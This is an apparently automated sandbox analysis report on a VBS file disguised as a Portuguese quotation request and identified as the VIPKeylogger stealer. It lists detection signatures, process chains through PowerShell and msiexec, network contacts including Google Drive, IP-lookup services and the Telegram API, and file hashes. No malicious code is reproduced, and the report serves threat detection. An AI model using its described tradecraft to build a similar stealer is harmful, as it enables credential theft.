Malware Analysis Report

2024-11-15 07:58

Sample ID 241023-r5ayqsxfjl
Target Pedido de Cotação-24100004_lista comercial.vbs
SHA256 400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741
Tags: vipkeylogger discovery execution keylogger stealer

Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

400f748c614f60bac08d298dce6f55abd9c84c944f303ce6106260d93315b741

Threat Level: Known bad

The file Pedido de Cotação-24100004_lista comercial.vbs was found to be: Known bad.

Malicious Activity Summary

vipkeylogger discovery execution keylogger stealer

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Network Service Discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Command and Scripting Interpreter: PowerShell

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-23 14:46

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-23 14:46

Reported

2024-10-23 14:48

Platform

win7-20240903-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.73:80 crl.microsoft.com tcp

Files

memory/2672-4-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp

memory/2672-6-0x0000000002340000-0x0000000002348000-memory.dmp

memory/2672-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2672-7-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2672-8-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2672-9-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2672-10-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2672-12-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp

memory/2672-13-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

memory/2672-15-0x000007FEF4CE0000-0x000007FEF567D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5MHP6VHWR454BS9L5LFT.temp

MD5 53eb1a2da1daa6ff5f0ececcca12b7ef
SHA1 25998cd34dffa6cbdf55b227ab1a7fe728859e15
SHA256 0366a5fb82142abd3491d6a802fb3599f42f168b2311158c1b9eb342f1d30bfa
SHA512 46e1454dd024b8f56aa31b5c5ab6d33d26da1cc43cf0d6253763d9ee5fadaa425652bfde4d0c08a6a71505f4b91d283589fd472174a63d55c4956e60b325da21

C:\Users\Admin\AppData\Roaming\Symbolerne.rab

MD5 4fa4bfe12534bd26a9e268a1e659e510
SHA1 f42014f4e7c0f11f4bb5f559c88310eb6db186a3
SHA256 11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0
SHA512 34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01

memory/2972-19-0x00000000065E0000-0x000000000B7C9000-memory.dmp

memory/1856-20-0x00000000004D0000-0x0000000001532000-memory.dmp

memory/1856-42-0x00000000004D0000-0x0000000001532000-memory.dmp

memory/1856-43-0x00000000004D0000-0x0000000000518000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-23 14:46

Reported

2024-10-23 14:48

Platform

win10v2004-20241007-en

Max time kernel

135s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1676 -ip 1676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1628

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/2004-0-0x00007FFE57A63000-0x00007FFE57A65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1j4t5zg1.nd5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2004-10-0x000001A7DDB60000-0x000001A7DDB82000-memory.dmp

memory/2004-11-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp

memory/2004-12-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp

memory/2004-14-0x00007FFE57A63000-0x00007FFE57A65000-memory.dmp

memory/2004-15-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp

memory/2004-17-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp

memory/2004-20-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp

memory/5100-21-0x0000000002C60000-0x0000000002C96000-memory.dmp

memory/5100-22-0x00000000057C0000-0x0000000005DE8000-memory.dmp

memory/5100-23-0x00000000056B0000-0x00000000056D2000-memory.dmp

memory/5100-24-0x0000000005750000-0x00000000057B6000-memory.dmp

memory/5100-25-0x0000000005E60000-0x0000000005EC6000-memory.dmp

memory/5100-35-0x0000000005F50000-0x00000000062A4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cb3bb854ff414cb031c64e184fd44781
SHA1 f53d30f0585d05a14f7dd82f2d0997ab44b02d62
SHA256 42a5d533e9f3aa3407b26bd46789cd5b5f5eb580a51e64ced44c4e34c9c49896
SHA512 9fdeb2a9b6fdd107e1ea87e646d295150fb0c8e1d1b32737cfb3fbfec9d2e595e237055676608e3474569e53b45e825b0ce28403de219cd36e48f7a3cb60e047

memory/5100-37-0x0000000006560000-0x000000000657E000-memory.dmp

memory/5100-38-0x00000000065B0000-0x00000000065FC000-memory.dmp

memory/5100-39-0x0000000007F00000-0x000000000857A000-memory.dmp

memory/5100-40-0x0000000006B00000-0x0000000006B1A000-memory.dmp

memory/5100-41-0x0000000007880000-0x0000000007916000-memory.dmp

memory/5100-42-0x0000000007780000-0x00000000077A2000-memory.dmp

memory/5100-43-0x0000000008580000-0x0000000008B24000-memory.dmp

C:\Users\Admin\AppData\Roaming\Symbolerne.rab

MD5 4fa4bfe12534bd26a9e268a1e659e510
SHA1 f42014f4e7c0f11f4bb5f559c88310eb6db186a3
SHA256 11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0
SHA512 34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01

memory/5100-45-0x0000000008B30000-0x000000000DD19000-memory.dmp

memory/1676-58-0x0000000000800000-0x0000000001A54000-memory.dmp

memory/1676-59-0x0000000000800000-0x0000000001A54000-memory.dmp